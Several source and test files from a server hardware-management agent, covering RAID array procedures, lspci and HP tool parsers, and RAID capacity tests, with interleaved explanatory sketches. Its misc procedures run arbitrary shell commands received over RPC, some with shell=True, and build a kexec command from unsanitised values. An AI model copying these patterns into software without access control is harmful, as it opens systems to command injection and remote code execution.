configuration = get_configuration().agent
errors = []
_health_data = health.system_health_inspector(global_device_info)
if _health_data['corrected_hardware_event_count'] >= configuration.hardware.mce_threshold:
errors.append(
'MCE count is {} which is above the configured threshold of {}'.format(
_health_data['corrected_hardware_event_count'],
configuration.hardware.mce_threshold))
return {
'errors': errors,
'error_count': len(errors)
}
```
#### File: mercury_agent/procedures/megaraid.py
```python
import logging
from mercury_agent.capabilities import capability
from mercury_agent.backend_client import get_backend_client
from mercury_agent.hardware.drivers.drivers import driver_class_cache
from mercury_agent.inspector.inspect import global_device_info
from mercury_agent.inspector.inspectors.raid import raid_inspector
log = logging.getLogger(__name__)
def get_megaraid_driver():
return driver_class_cache.get('megaraid_sas')
def has_megaraid_driver():
return bool(get_megaraid_driver())
def update_inventory():
backend_client = get_backend_client()
raid_info = raid_inspector(global_device_info)
mercury_id = global_device_info['mercury_id']
log.debug('RAID configuration changed, updating inventory')
backend_client.update(mercury_id, {'raid': raid_info})
def update_on_change(f):
def wrapped_f(*args, **kwargs):
result = f(*args, **kwargs)
update_inventory()
return result
wrapped_f.__name__ = f.__name__
wrapped_f.__doc__ = f.__doc__
return wrapped_f
@capability('megaraid_add',
description='Create and array on a megaraid_sas based controller',
kwarg_names=['controller', 'array_type', 'drives'],
serial=True,
dependency_callback=has_megaraid_driver,
timeout=60,
task_id_kwargs=True
)
@update_on_change
def megaraid_add(controller,
array_type,
drives,
size=None,
pdperarray=None,
pdcache=None,
dimmerswitch=None,
io_mode='direct',
write_policy='wb',
read_policy='ra',
cachevd=False,
stripe_size=None,
spares=None,
cached_bad_bbu=False,
after_vd=None):
""" Add virtual drive
:param controller: Controller ID
:param array_type: r[0|1|5|6|10|50|60]
:param drives: Drives specified with as EncID:drive,...
:param size: Size of a drive in MB or None for maximum
:param pdperarray: Specifies the number of physical drives per array. The
default value is automatically chosen.(0 to 16)
:param pdcache: Enables or disables PD cache. (on|off|default)
:param dimmerswitch: Specifies the power-saving policy. Sets to default
automatically. default: Logical device uses controller default power-saving
policy. automatic (auto): Logical device power savings managed by firmware.
none: No power-saving policy.
maximum (max): Logical device uses maximum power savings.
MaximumWithoutCaching (maxnocache): Logical device does not cache write to
maximize power savings.
:param io_mode: cached|direct
:param write_policy:wb|rt
:param read_policy:ra|rt
:param cachevd: enables or disables cachecade device support
:param stripe_size: stripe size ( the amount of data writen before moving to
the next disk )
:param spares: Numer drives allocated as hot spares
:param cached_bad_bbu: Enable write caches even when the bbu is missing or
discharged
:param after_vd: Specify an existing VD to add this new vd behind
:return: AttributeString of command output
"""
driver = get_megaraid_driver()
log.info('Adding Array: /c{} RAID{} drives: {} size: {}'.format(
controller,
array_type,
drives,
size
))
return driver.storcli.add(
controller,
array_type,
drives,
size=size,
pdperarray=pdperarray,
pdcache=pdcache,
dimmerswitch=dimmerswitch,
io_mode=io_mode,
write_policy=write_policy,
read_policy=read_policy,
cachevd=cachevd,
stripe_size=stripe_size,
spares=spares,
cached_bad_bbu=cached_bad_bbu,
after_vd=after_vd,
)
@capability('megaraid_delete',
description='Delete megaraid based virtual drive',
kwarg_names=['controller'],
serial=True,
dependency_callback=has_megaraid_driver,
timeout=60,
task_id_kwargs=True)
@update_on_change
def megaraid_delete(controller, virtual_drive='all'):
"""
:param controller: Controller id or all
:param virtual_drive: Virtual Drive id or all
:return:
"""
driver = get_megaraid_driver()
log.info('Deleting virtual drive: {} on controller: {}'.format(
controller, virtual_drive
))
return driver.storcli.delete(controller, virtual_drive)
```
#### File: mercury_agent/procedures/misc.py
```python
import logging
import subprocess
from mercury.common.helpers.cli import run
from mercury_agent.capabilities import capability
from mercury_agent.procedures.lib import download_file
log = logging.getLogger(__name__)
@capability('echo', 'Echo something to the console', num_args=1)
def echo(message):
"""
Echo the dolphin
:param message: message to Echo
:return: None
"""
log.info('Echo: %s' % message)
print(message)
return message
@capability('run', 'Run an arbitrary command', num_args=1)
def runner(command, _input=''):
"""
Run a shell command
:param command: The shell command to use
:param _input: Optional data to pass to stdin
:return:
"""
log.info('Running: %s' % command)
r = run(command, ignore_error=True, raise_exception=False, _input=_input)
return {
'stdout': r.stdout,
'stderr': r.stderr,
'returncode': r.returncode
}
@capability('run_async', 'Run a command in the background', num_args=1)
def runner_async(command, shell=True):
"""
:param command:
:param shell:
:return:
"""
subprocess.Popen('{}'.format(command), shell=shell)
@capability('kexec', 'kexec into kernel at supplied location',
kwarg_names=['kernel', 'initrd', 'options'],
no_return=True, serial=True)
def kexec(kernel='', initrd='', options=None, kernel_type='bzImage'):
"""
Kexec into a kernel
"""
options = options or []
command = 'kexec --type {kernel_type} --initrd={initrd} --append="{options}" {kernel}'.format(
kernel_type=kernel_type,
initrd=initrd,
options=' '.join(options),
kernel=kernel
)
# TODO: implement workflow that allows an agent to un-register itself
# Sleep a little bit to allow the command to return
log.info('Running Kexec: {}'.format(command))
runner_async('sleep 5;' + command)
@capability('reload', 'kexec into current preboot kernel, re-downloading the root file system',
num_args=2)
def reload(kernel_url, initrd_url):
"""
Reload the environment
"""
# This should look into the configuration to find the location
# of the kernel/initrd images and download them
kernel_file = '/tmp/vmlinuz'
initrd_file = '/tmp/initrd'
log.info('Downloading: {}'.format(kernel_url))
download_file(kernel_url, kernel_file)
log.info('Downloading: {}'.format(initrd_url))
download_file(initrd_url, initrd_file)
with open('/proc/cmdline') as fp:
options = fp.readline().split()
kexec(kernel=kernel_file, initrd=initrd_file, options=options)
```
#### File: mercury-agent/scratch/client_test.py
```python
import msgpack
import zmq
def transceiver(s, d):
packed = msgpack.packb(d)
s.send_multipart([packed])
    return msgpack.unpackb(s.recv(), encoding='utf-8')
ctx = zmq.Context()
socket = ctx.socket(zmq.REQ)
socket.connect('tcp://localhost:9003')
for i in range(100):
response = transceiver(socket, dict(category='rpc', method='echo', args=['This is the message: %s' % i]))
print(response)
response = transceiver(socket, dict(category='rpc', method='inspector'))
from pprint import pprint
pprint(response)
```
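For completeness, the REQ client above needs a REP socket on the other end that unpacks one msgpack dict per request; a generic echo responder it could talk to looks roughly like this (a sketch only, not the agent's actual RPC server):
```python
import msgpack
import zmq

ctx = zmq.Context()
socket = ctx.socket(zmq.REP)
socket.bind('tcp://*:9003')

while True:
    # Mirror the client framing: one msgpack-packed dict per request.
    # The encoding kwarg matches the older msgpack API used by the client.
    request = msgpack.unpackb(socket.recv(), encoding='utf-8')
    reply = {'echo': request}  # placeholder handling, no real dispatch
    socket.send(msgpack.packb(reply))
```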
#### File: oem/hp/test_hpasm.py
```python
import unittest
import mock
from mercury.common.helpers.cli import CLIResult
from mercury_agent.hardware.oem.hp import hpasmcli
class TestHPASMCLI(unittest.TestCase):
show_server_data = '\n\nSystem : ProLiant DL380 Gen9\nSerial No. : TC51NR9952\n' \
'ROM version : v2.60 (05/21/2018) P89\nUEFI Support : Yes\niLo ' \
'present : Yes\nEmbedded NICs : 8\n\tNIC1 MAC: 38:63:bb:3f:4b:f4\n\t' \
'NIC2 MAC: 38:63:bb:3f:4b:f5\n\tNIC3 MAC: 38:63:bb:3f:4b:f6\n\tNIC4 MAC: ' \
'38:63:bb:3f:4b:f7\n\tNIC5 MAC: 8c:dc:d4:ad:d6:d0\n\tNIC6 MAC: ' \
'8c:dc:d4:ad:d6:d1\n\tNIC7 MAC: 68:05:ca:39:89:a0\n\tNIC8 MAC: 68:05:ca:39:89:a1' \
'\n\nProcessor: 0\n\tName : Intel(R) Xeon(R) CPU E5-2630 v3 @ 2.40GHz' \
'\n\tStepping : 2\n\tSpeed : 2400 MHz\n\tBus : 100 MHz\n\tCore' \
' : 8\n\tThread : 16\n\tSocket : 1\n\tLevel1 Cache : ' \
'512 KBytes\n\tLevel2 Cache : 2048 KBytes\n\tLevel3 Cache : 20480 KBytes\n\t' \
'Status : Ok\n\nProcessor: 1\n\tName : ' \
'Intel(R) Xeon(R) CPU E5-2630 v3 @ 2.40GHz\n\tStepping : 2\n\t' \
'Speed : 2400 MHz\n\tBus : 100 MHz\n\tCore : 8\n\t' \
'Thread : 16\n\tSocket : 2\n\tLevel1 Cache : 512 KBytes\n\t' \
'Level2 Cache : 2048 KBytes\n\tLevel3 Cache : 20480 KBytes\n\tStatus : Ok' \
'\n\nProcessor total : 2\n\nMemory installed : 131072 MBytes\nECC ' \
'supported : Yes\n\n\n'
show_dimm_data = """
DIMM Configuration
------------------
Processor #: 1
Module #: 1
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 1
Module #: 4
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 1
Module #: 9
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 1
Module #: 12
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 1
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 4
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 9
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 12
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
"""
show_power_supply_data = '\nPower supply #1\n\tPresent : Yes\n\tRedundant: Yes' \
'\n\tCondition: Ok\n\tHotplug : Supported\n\tPower : 110 ' \
'Watts\nPower supply #2\n\tPresent : Yes\n\tRedundant: Yes' \
'\n\tCondition: Ok\n\tHotplug : Supported\n\tPower : 100 Watts\n\n'
def setUp(self):
self.mock_cli_patch = mock.patch('mercury_agent.hardware.oem.hp.hpasmcli.cli')
self.mock_cli = self.mock_cli_patch.start()
self.mock_cli.find_in_path = mock.Mock(return_value='/bin/bash')
def tearDown(self):
self.mock_cli_patch.stop()
def test_show_server(self):
self.mock_cli.run = mock.Mock(return_value=CLIResult(
self.show_server_data, '', 0))
hpasm = hpasmcli.HPASMCLI()
details = hpasm.show_server()
self.assertEqual(len(details['processors']), 2)
self.assertEqual(details['system'], 'ProLiant DL380 Gen9')
    def test_show_dimm(self):
self.mock_cli.run = mock.Mock(return_value=CLIResult(
self.show_dimm_data, '', 0))
hpasm = hpasmcli.HPASMCLI()
details = hpasm.show_dimm()
self.assertEqual(details[-1]['processor_#'], 2)
def test_show_power_supply(self):
self.mock_cli.run = mock.Mock(return_value=CLIResult(
self.show_power_supply_data, '', 0))
hpasm = hpasmcli.HPASMCLI()
power_supplies = hpasm.show_powersupply()
for ps in power_supplies:
self.assertEqual(ps['condition'], 'Ok')
```
#### File: unit/hwlib/test_lspci.py
```python
import mock
import pytest
import mercury_agent.inspector.hwlib.lspci as lspci
from tests.unit.base import MercuryAgentUnitTest
EXAMPLE_LSPCI_OUTPUT = """Slot: 00:00.0
Class: Host bridge [0600]
Vendor: Intel Corporation [8086]
Device: Xeon E7 v3/Xeon E5 v3/Core i7 DMI2 [2f00]
SVendor: Intel Corporation [8086]
SDevice: Device [0000]
Rev: 02
NUMANode: 0
Slot: 00:01.0
Class: PCI bridge [0604]
Vendor: Intel Corporation [8086]
Device: Xeon E7 v3/Xeon E5 v3/Core i7 PCI Express Root Port 1 [2f02]
Rev: 02
Driver: pcieport
Module: shpchp
NUMANode: 0
Slot: 00:14.0
Class: USB controller [0c03]
Vendor: Intel Corporation [8086]
Device: C610/X99 series chipset USB xHCI Host Controller [8d31]
SVendor: ASUSTeK Computer Inc. [1043]
SDevice: Device [8600]
Rev: 05
ProgIf: 30
Driver: xhci_hcd
NUMANode: 0
Slot: 00:16.0
Class: Communication controller [0780]
Vendor: Intel Corporation [8086]
Device: C610/X99 series chipset MEI Controller #1 [8d3a]
SVendor: ASUSTeK Computer Inc. [1043]
SDevice: Device [8600]
Rev: 05
Driver: mei_me
Module: mei_me
NUMANode: 0
Slot: 00:19.0
Class: Ethernet controller [0200]
Vendor: Intel Corporation [8086]
Device: Ethernet Connection (2) I218-V [15a1]
SVendor: ASUSTeK Computer Inc. [1043]
SDevice: Device [85c4]
Rev: 05
Driver: e1000e
Module: e1000e
NUMANode: 0
Slot: 05:00.0
Class: Non-Volatile memory controller [0108]
Vendor: Samsung Electronics Co Ltd [144d]
Device: NVMe SSD Controller SM951/PM951 [a802]
SVendor: Samsung Electronics Co Ltd [144d]
SDevice: Device [a801]
PhySlot: 2-1
Rev: 01
ProgIf: 02
Driver: nvme
Module: nvme
NUMANode: 0
"""
EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT = [
{
'slot': u'00:00.0',
'class_name': u'Host bridge',
'class_id': u'0600',
'vendor_name': u'Intel Corporation',
'vendor_id': u'8086',
'device_name': u'Xeon E7 v3/Xeon E5 v3/Core i7 DMI2',
'device_id': u'2f00',
'svendor_name': u'Intel Corporation',
'svendor_id': u'8086',
'sdevice_name': u'Device',
'sdevice_id': u'0000',
'revision': u'02',
},
{
'slot': '00:01.0',
'class_name': 'PCI bridge',
'class_id': '0604',
'vendor_name': 'Intel Corporation',
'vendor_id': '8086',
'device_name': 'Xeon E7 v3/Xeon E5 v3/Core i7 PCI Express Root Port 1',
'device_id': '2f02',
'revision': '02',
'driver': 'pcieport',
},
{
'slot': '00:14.0',
'class_name': 'USB controller',
'class_id': '0c03',
'vendor_name': 'Intel Corporation',
'vendor_id': '8086',
'device_name': 'C610/X99 series chipset USB xHCI Host Controller',
'device_id': '8d31',
'svendor_name': 'ASUSTeK Computer Inc.',
'svendor_id': '1043',
'sdevice_name': 'Device',
'sdevice_id': '8600',
'revision': '05',
'progif': '30',
'driver': 'xhci_hcd'
},
{
'slot': '00:16.0',
'class_name': 'Communication controller',
'class_id': '0780',
'vendor_name': 'Intel Corporation',
'vendor_id': '8086',
'device_name': 'C610/X99 series chipset MEI Controller #1',
'device_id': '8d3a',
'svendor_name': 'ASUSTeK Computer Inc.',
'svendor_id': '1043',
'sdevice_name': 'Device',
'sdevice_id': '8600',
'revision': '05',
'driver': 'mei_me'
},
{
'slot': '00:19.0',
'class_name': 'Ethernet controller',
'class_id': '0200',
'vendor_name': 'Intel Corporation',
'vendor_id': '8086',
'device_name': 'Ethernet Connection (2) I218-V',
'device_id': '15a1',
'svendor_name': 'ASUSTeK Computer Inc.',
'svendor_id': '1043',
'sdevice_name': 'Device',
'sdevice_id': '85c4',
'revision': '05',
'driver': 'e1000e'
},
{
'slot': '05:00.0',
'class_name': 'Non-Volatile memory controller',
'class_id': '0108',
'vendor_name': 'Samsung Electronics Co Ltd',
'vendor_id': '144d',
'device_name': 'NVMe SSD Controller SM951/PM951',
'device_id': 'a802',
'svendor_name': 'Samsung Electronics Co Ltd',
'svendor_id': '144d',
'sdevice_name': 'Device',
'sdevice_id': 'a801',
'revision': '01',
'driver': 'nvme',
'progif': '02',
},
]
FIELDS_PARSED_BY_MODULE = [
'class_id',
'class_name',
'device_id',
'device_name',
'driver',
'progif',
'revision',
'sdevice_id',
'sdevice_name',
'slot',
'svendor_id',
'svendor_name',
'vendor_id',
'vendor_name',
]
# Missing entries should be set to None to match unit behavior.
def _fixup_parsed_output():
for device in EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT:
for field in FIELDS_PARSED_BY_MODULE:
if field not in device.keys():
device[field] = None
_fixup_parsed_output()
def get_fake_pcidevice_required_args(slot='00:00.0', class_id='beef',
vendor_id='dead', device_id='ffff'):
"""Get a dict of args for lspci.PCIDevice"""
return {
'slot': slot,
'class_id': class_id,
'vendor_id': vendor_id,
'device_id': device_id
}
class MercuryMiscLspciUnitTests(MercuryAgentUnitTest):
"""Unit tests for mercury_agent.inspector.hwlib.lspci"""
@mock.patch('mercury_agent.inspector.hwlib.lspci.subprocess.Popen')
def setUp(self, popen_mock):
"""Setup a PCIBus object for each test."""
popen_mock.return_value.communicate.return_value = (
EXAMPLE_LSPCI_OUTPUT, '')
popen_mock.return_value.returncode = 0
self.pci_bus = lspci.PCIBus()
def test_example_output_parsing(self):
"""Test if PCIBus/parse_lspci parsed the example output correctly."""
assert len(self.pci_bus) == len(EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT)
for device in self.pci_bus:
assert device in EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT
@mock.patch('mercury_agent.inspector.hwlib.lspci.subprocess.Popen')
    def test_lspci_run_raises(self, popen_mock):
        """Test what happens when lspci returns a non-zero exit code."""
popen_mock.return_value.communicate.return_value = (
EXAMPLE_LSPCI_OUTPUT, '')
popen_mock.return_value.returncode = 1
with pytest.raises(lspci.LSPCIError):
lspci.lspci_run()
def test_pci_device_raises_on_missing_arg(self):
"""Test that PCIDevice raises when missing args."""
test_args = get_fake_pcidevice_required_args()
# Check that test_args works.
lspci.PCIDevice(**test_args)
# Check key absence raises.
for key in test_args:
value = test_args[key]
del test_args[key]
with pytest.raises(lspci.LSPCIError):
lspci.PCIDevice(**test_args)
test_args[key] = value
def test_pci_device__getattr__(self):
"""Test PCIDevice.__getattr__ behavior."""
pci_device = lspci.PCIDevice(**get_fake_pcidevice_required_args())
assert pci_device.slot == '00:00.0'
assert pci_device.asdfjkl is None
def test_pcibus_get_devices_by_class(self):
"""Test PCIBus.get_devices_by_class()"""
devices = self.pci_bus.get_devices_by_class('0108')
assert isinstance(devices, list)
assert len(devices) == 1
assert devices[0]['device_id'] == 'a802'
def test_pcibus_has_device_class(self):
"""Test PCIBus.has_device_class()"""
assert self.pci_bus.has_device_class('0108')
assert self.pci_bus.has_device_class('0200')
assert not self.pci_bus.has_device_class('1337')
assert not self.pci_bus.has_device_class('beef')
def test_pcibus_get_devices_by_vendor(self):
"""Test PCIBus.get_devices_by_vendor()"""
intel_devices = self.pci_bus.get_devices_by_vendor('8086')
assert isinstance(intel_devices, list)
assert len(intel_devices) == 5
for device in intel_devices:
assert device['vendor_id'] == '8086'
assert device in EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT
samsung_devices = self.pci_bus.get_devices_by_vendor('144d')
assert isinstance(intel_devices, list)
assert len(samsung_devices) == 1
assert samsung_devices[0]['vendor_id'] == '144d'
assert samsung_devices[0] in EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT
no_devices = self.pci_bus.get_devices_by_vendor('1337')
assert isinstance(no_devices, list)
assert len(no_devices) == 0
def _membership_and_retrieval_test_helper(self, class_id, name):
get_function_name = 'get_' + name + '_devices'
get_func = getattr(self.pci_bus, get_function_name)
has_function_name = 'has_' + name
has_func = getattr(self.pci_bus, has_function_name)
        # Remove any devices of the given class currently in the pci_bus object.
to_delete = []
for index in range(0, len(self.pci_bus)):
if self.pci_bus[index]['class_id'] == class_id:
to_delete.append(index)
# Go backwards so indices remain valid after deletion.
for index in reversed(to_delete):
del self.pci_bus[index]
assert not has_func()
class_devices = get_func()
assert isinstance(class_devices, list)
assert len(class_devices) == 0
self.pci_bus.append(
lspci.PCIDevice(
**get_fake_pcidevice_required_args(class_id=class_id)))
assert has_func()
class_devices = get_func()
assert isinstance(class_devices, list)
assert len(class_devices) == 1
def test_pcibus_get_has_fibre_channel_devices(self):
"""Test PCIBus.get_fibre_channel_devices()"""
"""Test PCIBus.{get,has}_fibre_channel[_devices]()"""
self._membership_and_retrieval_test_helper(lspci.FIBRE_CHANNEL,
'fibre_channel')
def test_pcibus_get_has_ethernet_devices(self):
"""Test PCIBus.{get,has}_ethernet[_devices]()"""
self._membership_and_retrieval_test_helper(lspci.ETHERNET_CONTROLLER,
'ethernet')
def test_pcibus_get_has_network_devices(self):
"""Test PCIBus.{get,has}_network[_devices]()"""
self._membership_and_retrieval_test_helper(lspci.NETWORK_CONTROLLER,
'network')
def test_pcibus_get_has_raid_bus_devices(self):
"""Test PCIBus.{get,has}_raid_bus[_devices]()"""
self._membership_and_retrieval_test_helper(lspci.RAID_CONTROLLER,
'raid_bus_controller')
```
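The fixture above pairs a raw `lspci -vmm`-style dump with the dicts the parser is expected to emit. Purely to make that mapping explicit, here is a hedged sketch (not `mercury_agent`'s actual parser) of turning such colon-separated records into dicts, using the field names from `EXPECTED_PARSED_EXAMPLE_LSPCI_OUTPUT`:
```python
# Hedged sketch only: maps "Key: Value" lines to the field names used in the
# expected-output dicts above. Not the implementation under test.
def parse_lspci_records(output):
    simple_keys = {'Slot': 'slot', 'Rev': 'revision', 'ProgIf': 'progif', 'Driver': 'driver'}
    bracketed_keys = ('Class', 'Vendor', 'Device', 'SVendor', 'SDevice')
    devices, current = [], None
    for line in output.splitlines():
        if not line.strip():
            continue
        key, _, value = line.partition(':')
        key, value = key.strip(), value.strip()
        if key == 'Slot':  # every Slot line starts a new record
            current = {}
            devices.append(current)
        if current is None:
            continue
        if key in bracketed_keys:
            # "Host bridge [0600]" -> name "Host bridge", id "0600"
            name, _, code = value.rpartition('[')
            current[key.lower() + '_name'] = name.strip()
            current[key.lower() + '_id'] = code.rstrip(']')
        elif key in simple_keys:
            current[simple_keys[key]] = value
    return devices

# The first parsed record then carries slot '00:00.0' and device_id '2f00',
# matching the first expected dict above (minus its None-filled fields).
```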
#### File: unit/raid_abstraction/test_api.py
```python
import json
import os
from mercury_agent.hardware.raid.abstraction.api import (
RAIDAbstractionException,
RAIDActions,
)
from ..base import MercuryAgentUnitTest
class DummyImplementation(RAIDActions):
def __init__(self):
super(DummyImplementation, self).__init__()
with open(os.path.join(os.path.dirname(__file__), '../resources/dummy.json')) as fp:
self.dummy_data = json.load(fp)
def transform_adapter_info(self, adapter_index):
try:
return self.dummy_data[adapter_index]
except IndexError:
raise RAIDAbstractionException('...')
def create(self, adapter, level, drives=None, size=None, array=None):
return True
def delete_logical_drive(self, adapter, array, ld):
return True
def clear_configuration(self, adapter):
return True
def add_spares(self, adapter, drives, arrays=None):
return True
@staticmethod
def sort_drives(drives):
drives.sort(key=lambda x: '{}-{:05}-{:05}'.format(
x['extra']['port'], int(x['extra']['box']), int(x['extra']['bay'])))
class MercuryRAIDAbstractionAPITest(MercuryAgentUnitTest):
def setUp(self):
super(MercuryRAIDAbstractionAPITest, self).setUp()
self.dummy = DummyImplementation()
self.abstract = RAIDActions()
def test_raid_calc(self):
_calc = self.dummy.raid_calculator
tests = [
dict(level='0', number=1, size=300, result=300),
dict(level='1', number=2, size=300, result=300),
dict(level='5', number=3, size=300, result=600),
dict(level='6', number=6, size=300, result=1200),
dict(level='10', number=4, size=300, result=600),
dict(level='1+0', number=4, size=300, result=600),
dict(level='50', number=6, size=300, result=1200),
dict(level='60', number=8, size=300, result=1200)
]
for test in tests:
assert _calc(test['level'], test['number'], test['size']) == test['result']
self.assertRaises(RAIDAbstractionException, _calc, *('20', 0, 0, 0))
def test_raid_minimums(self):
_min = self.dummy.raid_minimums
tests = [
dict(level='1', _pass=2, fail=1),
dict(level='5', _pass=3, fail=2),
dict(level='6', _pass=4, fail=3),
dict(level='10', _pass=4, fail=7),
dict(level='1+0', _pass=4, fail=3),
dict(level='50', _pass=6, fail=5),
dict(level='60', _pass=8, fail=7)
]
for test in tests:
# Will raise on failure
self.assertEqual(_min(test['level'], test['_pass']), None)
for test in tests:
self.assertRaises(RAIDAbstractionException, _min, *(test['level'], test['fail']))
self.assertRaises(RAIDAbstractionException, _min, *('60', 11))
def test_create(self):
# Create new array
assert self.dummy.create_logical_drive(adapter=0, level='0', drives='9, 10', size='10GiB')
assert self.dummy.create_logical_drive(adapter=0, level='0', drives='9-11', size='10%FREE')
assert self.dummy.create_logical_drive(adapter=0, level='0', drives=9)
assert self.dummy.create_logical_drive(adapter=0, level='0', drives=[9, 10, 11])
# Update existing array
assert self.dummy.create_logical_drive(adapter=0, level='0', array=0, size='10%FREE')
test_exception_args = [
(0, '0', '9, 10', '100TiB'), # Size is too big
(0, '0'), # Neither drives or array is specified
(0, '0', None, '10GiB', 100), # Array index is invalid
(1, '0', None, '1MiB', 0), # Not enough free space
(0, '0', None, '100TiB', 0), # Array does not have enough free space
(0, '0', None, '100%', 0), # Only %FREE is supported
(0, '0', '11-9', None, None), # range is negative
(0, '0', '9-XXX', None, None), # range is nonsense
(0, '0', '9_10', None, None), # range needs a '-'
(0, '0', '9-10-11', None, None), # too many '-'
(0, '0', 'all', None, None), # All drives are not available
(0, '0', 'unassigned', None, None), # One of the unassigned drives is marked FAILED
]
for args in test_exception_args:
self.assertRaises(RAIDAbstractionException, self.dummy.create_logical_drive, *args)
def test_abstract(self):
# Silly tests for 'coverage'
self.assertRaises(NotImplementedError, self.abstract.transform_adapter_info, *(0, ))
self.assertRaises(NotImplementedError, self.abstract.create, *(0, 0))
self.assertRaises(NotImplementedError, self.abstract.delete_logical_drive, *(0, 0, 0))
self.assertRaises(NotImplementedError, self.abstract.clear_configuration, *(0, ))
self.assertRaises(NotImplementedError, self.abstract.add_spares,
*(0, 0, None))
self.abstract.sort_drives([0, 1, 2, 3])
def test_get_drives(self):
assert self.dummy.get_unassigned(0)
self.assertRaises(RAIDAbstractionException,
self.dummy.get_unassigned, *(100, )) # invalid adapter
def test_add_index(self):
# Tests that indexes are added to drives
drives = self.dummy.get_all_drives(0)
for idx in range(len(drives)):
assert idx == drives[idx]['index']
```
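The `tests` table in `test_raid_calc` above encodes the usual usable-capacity rules per RAID level: striping, mirroring, single and double parity, and the nested 10/50/60 variants. The following standalone sketch only spells out that arithmetic so the expected values are easy to verify; it is not `RAIDActions.raid_calculator` itself.
```python
# Hedged sketch of the usable-capacity arithmetic implied by the test table above.
def usable_capacity(level, drive_count, drive_size):
    if level == '0':
        return drive_count * drive_size         # pure striping
    if level == '1':
        return drive_size                       # two-drive mirror
    if level == '5':
        return (drive_count - 1) * drive_size   # single parity
    if level == '6':
        return (drive_count - 2) * drive_size   # double parity
    if level in ('10', '1+0'):
        return drive_count // 2 * drive_size    # striped mirrors
    if level == '50':
        return (drive_count - 2) * drive_size   # two RAID-5 spans
    if level == '60':
        return (drive_count - 4) * drive_size   # two RAID-6 spans
    raise ValueError('unsupported RAID level: {}'.format(level))

# e.g. usable_capacity('6', 6, 300) == 1200 and usable_capacity('10', 4, 300) == 600,
# matching the expected results in the table above.
```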
#### File: unit/raid_abstraction/test_hp.py
```python
import json
import os
import random
import mock
from hpssa.hpssa import Adapter
from mercury_agent.hardware.drivers.hp_raid import (
RAIDAbstractionException,
SmartArrayActions,
SmartArrayDriver
)
from ..base import MercuryAgentUnitTest
def get_adapters():
with open(os.path.join(os.path.dirname(__file__), '../resources/adapters.json')) as fp:
return json.load(fp)
class DummySmartArrayActions(SmartArrayActions):
def __init__(self):
super(SmartArrayActions, self).__init__()
self.hpssa = mock.Mock()
self.hpssa.adapters = [Adapter(**a) for a in get_adapters()]
self.hpssa.create = mock.Mock(return_value=True)
self.hpssa.delete_logical_drive = mock.Mock(return_value=True)
self.hpssa.delete_all_logical_drives = mock.Mock(return_value=True)
self.hpssa.add_spares = mock.Mock(return_value=True)
class DummySmartArrayDriver(SmartArrayDriver):
_handler = DummySmartArrayActions
# noinspection PyMethodMayBeStatic
# noinspection PyMethodOverriding
class MercurySmartArrayDriverTest(MercuryAgentUnitTest):
def setUp(self):
super(MercurySmartArrayDriverTest, self).setUp()
def test_probe(self):
with open(os.path.join(os.path.dirname(__file__), '../resources/pci_data.json')) as fp:
pci_data = json.load(fp)
assert SmartArrayDriver.probe(pci_data)
assert not SmartArrayDriver.probe([])
def test_inspect(self):
with open(os.path.join(os.path.dirname(__file__), '../resources/pci_data.json')) as fp:
pci_data = json.load(fp)
devices = SmartArrayDriver.probe(pci_data)
driver = DummySmartArrayDriver(devices)
data = driver.inspect()
assert data
class MercurySmartArrayActionsTest(MercuryAgentUnitTest):
def setUp(self):
super(MercurySmartArrayActionsTest, self).setUp()
self.dummy_actions = DummySmartArrayActions()
@mock.patch('mercury_agent.hardware.drivers.hp_raid.HPSSA')
@mock.patch('mercury_agent.hardware.drivers.hp_raid.get_configuration')
    def test_real_init(self, mock_get_configuration, mock_hpssa):
SmartArrayActions()
def test_missing_array(self):
original = get_adapters()[0]
modified = original.copy()
modified['configuration']['spares'][0]['arrays'] = ['Z'] # doesn't exist
dummy_actions = DummySmartArrayActions()
self.assertRaises(RAIDAbstractionException,
dummy_actions.transform_configuration, *(modified['configuration'], ))
def test_get_slot(self):
assert isinstance(self.dummy_actions.get_slot(self.dummy_actions.get_adapter_info(0)), int)
# Code (Jared) is paranoid and tests for missing vendor info
temp_actions = DummySmartArrayActions()
adapter_info = temp_actions.get_adapter_info(2)
del adapter_info['vendor_info']['slot']
self.assertRaises(RAIDAbstractionException, temp_actions.get_slot, *(adapter_info,))
def test_get_letter_from_index(self):
assert self.dummy_actions.get_letter_from_index(self.dummy_actions.get_adapter_info(0), 0) == 'A'
self.assertRaises(RAIDAbstractionException, self.dummy_actions.get_letter_from_index, *(
self.dummy_actions.get_adapter_info(0), 100))
def test_sort_drives(self):
drives = [
{
'index': 0,
'extra': {
'port': '1I',
'box': '1',
'bay': '1'
}
},
{
'index': 1,
'extra': {
'port': '2I',
'box': '1',
'bay': '1'
}
},
{
'index': 2,
'extra': {
'port': '2I',
'box': '2',
'bay': '1'
}
},
{
'index': 3,
'extra': {
'port': '3I',
'box': '1',
'bay': '1'
}
